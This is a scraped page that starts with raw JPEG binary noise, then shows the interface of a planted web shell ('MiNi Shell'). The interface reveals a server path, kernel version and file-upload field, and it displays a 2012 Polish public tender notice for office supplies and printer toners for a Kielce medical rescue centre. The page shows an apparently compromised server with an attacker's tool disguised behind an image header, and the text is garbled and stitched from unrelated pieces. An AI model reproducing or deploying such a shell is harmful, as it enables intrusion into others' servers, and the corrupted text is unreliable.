JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120604/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120604/185824-N-2012.html

<p class="kh_header"><b>Kielce: Dostawy materiałów biurowych</b><br>
<b>Numer ogłoszenia: 185824 - 2012; data zamieszczenia: 04.06.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Świętokrzyskie Centrum Ratownictwa Medycznego i Transportu Sanitarnego , ul. Św. Leonarda 10, 25-311 Kielce, woj. świętokrzyskie, tel. 041 3612344 w. 29.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.scrmits.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawy materiałów biurowych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są dostawy materiałów biurowych w okresie 3 lat od daty  
     zawarcia umowy w następujących ilościach i rodzajach.

      Zadanie Nr 1: 
       
Lp	Asortyment	Ilość	J.m
1.	Blok biurowy 100kartek. A4 w kratkę	135	szt.
2.	Blok biurowy 100 kartek A5 w kratkę	120	szt.
3.	Klip teczka zamykana A4	300	szt.
4.	Klip teczka zamykana A5	300	szt.
5.	Długopis Ball Point Pen Plastic   szerokość linii pisania 0,5mm, długość linii pisania 2500 m    (1 op = 24 szt)	45	op
6.	Długopis typu Handy  żel ,  linia pisania 0,32mm długość linii 1000m, końcówka  ze wzmocnionej stali nierdzewnej ,ergonomiczny, wygodny uchwyt, gładka i równa linia pisania, dostępny w 4 kolorach	1200	szt.
7	Dziurkacz - metalowy o dużej wytrzymałości, wyposażony we wskaźnik środka strony oraz listwę formatową; średnica otworów 6 mm; rozstaw otworów 80 mm; możliwość dziurkowania jednorazowo 30 kartek 	45	szt.
8	Gumka Pilot EE-101 , wysokiej jakości, niebrudzące , przeznaczone do stosowania na papierze i folii.	150	szt
9	Klej w sztyfcie 22g. Wysokiej jakości klej bezbarwny i bezwonny, nietoksyczny zmywalny z większości powierzchni, do klejenia tektury papieru zdjęć i materiału, posiada atest PZH , 2 lata gwarancji, Kolorystyka obudowy zielono-żółta.	210	szt.
10	Koperta biała C5 samoklejąca op. 500Szt.	30	op.
11	Koperta biała C6 samoklejąca op. 1000Szt.	30	op.
12	Koperta biała C4 samoklejąca op. 250Szt.	30	op.
13	Koperta utajniona 210x12x6 (1+2)  1 op. 1200szt	36	op.
14	Korektor w piórze z metalowa końcówką, szybkoschnący, posiada formułę chroniącą warstwę ozonową pojemność 7ml.	450	szt.
15	Kostka biała klejona 8*8*4	600	bl.
16	Bloczki samoprzylepne 76*76 100k.	150	bl.
17	Linijka 30cm, plastikowa	60	szt.
18	Marker pernamentny  okrągła końcówka, pisze po każdej powierzchni, szybkoschnący tusz nie rozmazuje się, wodoodporny, nie blaknie pod wpływem działania promieni słonecznych, w aluminiowej obudowie, odporny na wysychanie zgniecenia i pęknięcia, przyjazny dla środowiska nie zawiera ksylenu, linia pisania 1mm długość linii pisania 900m - pięć kolorów	300	szt.
19	Nożyczki biurowe 20 cm; wykonane ze stali nierdzewnej o bardzo wysokiej jakości; wytrzymała raczka (odporna na pęknięcia i odpryski; wzbogacona o gumowy uchwyt ( soft-grip); do cięcia papieru, kartonu, tektury, zdjęć, taśmy samoprzylepnej; miękka rękojeść; antyalergiczne wykończenie rączek 	45	szt.
20	Obwoluta z folii krystaliczna A4 op. 100Szt.	300	op.
21	Ołówek z gumką , wykonany z żywicy syntetycznej, super trwały niełamliwy grafit, doskonale się ostrzy, w razie złamania nie pozostawia drzazg i nie kaleczy	300	szt.
22	Papier ksero A4 Polspeed 80g./m2 146CIE, wilgotność 3,0-5,0% ryza 500ark. 	2250	ryza
23	Rolki termoczułe 110x20m op. 10 szt. (papier bezpyłowy, bezdrzewny, bezchlorowy)	150	op.
24	Segregator z mechanizmem A4; szerokość grzbietu: 50 mm; okleina PCV; kolor; wymienna etykiet 	150	szt.
25	Segregator z mechanizmem A4; szerokość grzbietu: 75 mm; okleina PCV; kolor; wymienna etykieta	450	szt.
26	Segregator z mechanizmem A5; szerokość grzbietu: 75 mm; okleina PCV; kolor; wymienna etykieta	60	szt.
27	Skoroszyt papierowy biały A4	1800	szt.
28	Skoroszyt plastikowy A4 wpinany do segregatora	900	szt.
29	Spinacz biurowy R-28 op. 100Szt.	600	op.
30	Temperówka; wykonana ze specjalnego stopu magnezu; stalowe ostrze mocowane wkrętem; rowkowania w korpusie ułatwiają trzymanie	90	szt.
31	Taśma biurowa 18x30m	360	szt.
32	Teczka akta osobowe, twarda oprawa introligatorska z papierowej okleiny ,  trzy przegródki A,B,C, 	240	szt.
33	Teczka wiązana biała papierowa	1950	szt.
34	Torebki strunowe A4 op. 100Szt.	15	op.
35	Torebki strunowe A5 op. 100Szt.	15	op.
36	Tusz wodny do papieru i dokumentów, do stempli ręcznych i poduszek micro; idealny do stempli z gumowa lub polimerową płytką stemplujacą; pojemność: 25 ml; butelka z dozownikiem	150	szt.
37	Wkład typu handy żel Linia pisania 0,32mm długość linii pisania1000m do poz. nr. 6	750	szt.
38	Zakreślacz Donau , grubość linii pisania 1-5mm długość linii 140m, gumowane boki obudowy.	300	szt.
39	Zeszyt A4 /96k. Twarda oprawa	300	szt.
40	Zeszyt A5/32k w kratkę	450	szt.
41	Zeszyt A5/60k. w kratkę	600	szt.
43	Zeszyt A5/96k. w kratkę	150	szt.
44	Zszywki 24/6 op. 1000Szt.	750	op.
45	Zszywacz -  metalowy na zszywki 24/6 / 26/6; wyposażony w obrotowy mechanizm umożliwiający zaginanie zszywek do wewnątrz i na zewnątrz; głębokość zszywania 50 mm; możliwość zszywania jednorazowo 25 kartek
	75	szt.

Zadanie Nr 2:
Lp	Asortyment	Ilość	J.m
1.	Toner do drukarki HP LJ P 2015 21-400 - HP7553- A00  Q7553A	30	szt
2.	Toner do drukarki HP LJ 2015  21-400 - HP 7553 - X00  Q 7553X	30	szt
3.	Toner do HO LJ (Q7553A) P 2015 - zamiennik  InterCom	30	szt
4.	Toner do HP LJ (Q 7553X) P 2015 - zamiennik InterCom	30	szt
5.	Toner do HP LJ P 2035/2055 21-400 - HP 0505-000 CE 505A	90	szt
6.	Toner do HP LJ P 2055 21-400 H 0505 -  -X00 CE 505X	90	szt
7	Toner do drukarki HP LJ PP 2035/P2055 (CE 505 A) 21-490-HP 0505 - A 02 	90	szt
8	Printe Toner zamiennik 100% nowy do HP CE 505X 21-490 HP 0505 - X00	90	szt
9	Tusz do HP DJ s. 800 black 21-500 HP 5164-5A0	30	szt
10	Tusz do DJ s. 450 color C6578D 21-500 HP 6578 - D00	30	szt
11	Tusz czarny do HP s. 800 51645A zamiennik InterCom 21-530-5164-5A0	30	szt
12	Printe AH 78 zamiennik do HP DJ 930 C (C6578 AE/DE) PRO kolor 21-590-HP6578-000	30	szt
13	Toner do drukarki HP LJ 1100/3200 C 092A 21-400-HP4092-A00	15	szt
14	Toner do HP LJ (C4092A) PRINTE pro 21-440-HP4092-A01	15	szt
15	Canon PG-40 tusz czarny doiP1200 21-500-CANPG40-000	15	szt
16	Tusz do Canon ip 1200 Black PointBPC 41 (zamiennik Canon CL-41) 21-510 CANCL41-000	15	szt
17	Tusz do Canon iP black POINT BPC 40  1200/1300/1600/2200 (zamiennik Canon PG - 40 ) 21-510-CANPG 40-000	15	szt
18	Tusz nr 100 do serii S/Pro Cyjan Lexmark 14N0900E - LEX 14NO-900 21-500-lex 14NO-900	15	szt
19	Tusz nr 100 do serii S/Pro Magenta Lexmark 14N0901E  LEX 14NO-901 21-500-lex14NO-901	15	szt
20	Tusz nr 100 do serii S/Pro Yellow Lexmark 14N0902E - LEX 14NO-902 21-500-lex14NO-902	15	szt
21	Tusz nr 100 do serii S/Pro Black Lexmark 14N0900E - LEX 14NO-820 14N0820E	15	szt
22	Toner do HP LJ (CB436A) PRINTE pro  21-440-HP0436-A00	15	szt
23	Toner do drukarek HP LJ P1505  M1120, M1522 (CB436A)  21-400-HP0436-A00	15	szt
24	Toner Typ T do Faksu Canon L380/400/PC-D340 (Cartridge T CRGT) 21-400-CAN000T000	9	szt
25	Printe Toner Canon Typ T do L380, L400 21-400-CANT000-000	9	szt
26	Sharp AR 168 T toner do 122/153/5012/5415 ARM-155 Katun 21-110-SHA0168-000	30	szt
27	Sharp AR -208T toner do AR-203E/AR-M200/201/AR5420 21-110-SHA0208-000	15	szt
28	Toner OKI B2500/2520/2540 black (2,2 tys.stron) 21-400-OKI2500-B00	15	szt
29	Bęben KX-FAD 93E Panasonic (KX-MB773) 29-300-PAN0093-000	6	szt
30	Bęben KX-FA 84E Panasonic (KX-FL513/613/653) oryginał 29-310-PAN0084-000	18	szt
31	Bęben do KX-FL613 (KX-FA 84E) Panasonic Printe DP84E  29-312-PAN0084-000	12	szt.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 30.19.20.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 36.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o spełnieniu warunków udziału w postępowaniu art.22ust.1 ustawy pzp</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o spełnieniu warunków udziału w postępowaniu art.22ust.1 ustawy pzp</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o spełnieniu warunków udziału w postępowaniu art.22ust.1 ustawy pzp</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o spełnieniu warunków udziału w postępowaniu art.22ust.1 ustawy pzp</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o spełnieniu warunków udziału w postępowaniu art.22ust.1 ustawy pzp</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający ma prawo nie wykorzystać w okresie realizacji umowy pełnej ilości 
    zapotrzebowania określonego w umowie.
 Cena jednostkowa przedmiotu umowy może ulec zmianie w przypadku zmiany stawki 
     VAT, zmianie ulegnie kwota VAT i cena brutto.
 Okres gwarancji niezmienności cen netto, strony ustalają na okres 12  miesięcy.
 Ceny jednostkowe netto przedmiotu umowy mogą ulec zmianie po 12 miesiącach od 
      daty zawarcia umowy o (+, -) procentowy wzrost cen producenta, o czym Wykonawca 
      powiadomi Zamawiającego na piśmie z 7 dniowym wypowiedzeniem i udokumentuje 
      podstawę zmiany ceny.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.scrmits.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> 25-040 Kielce ul. Pakosz 72, pokój 301.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.06.2012 godzina 12:00, miejsce: 25-040 Kielce ul. Pakosz 72, pokój 301.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> do 14.07.2012.</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com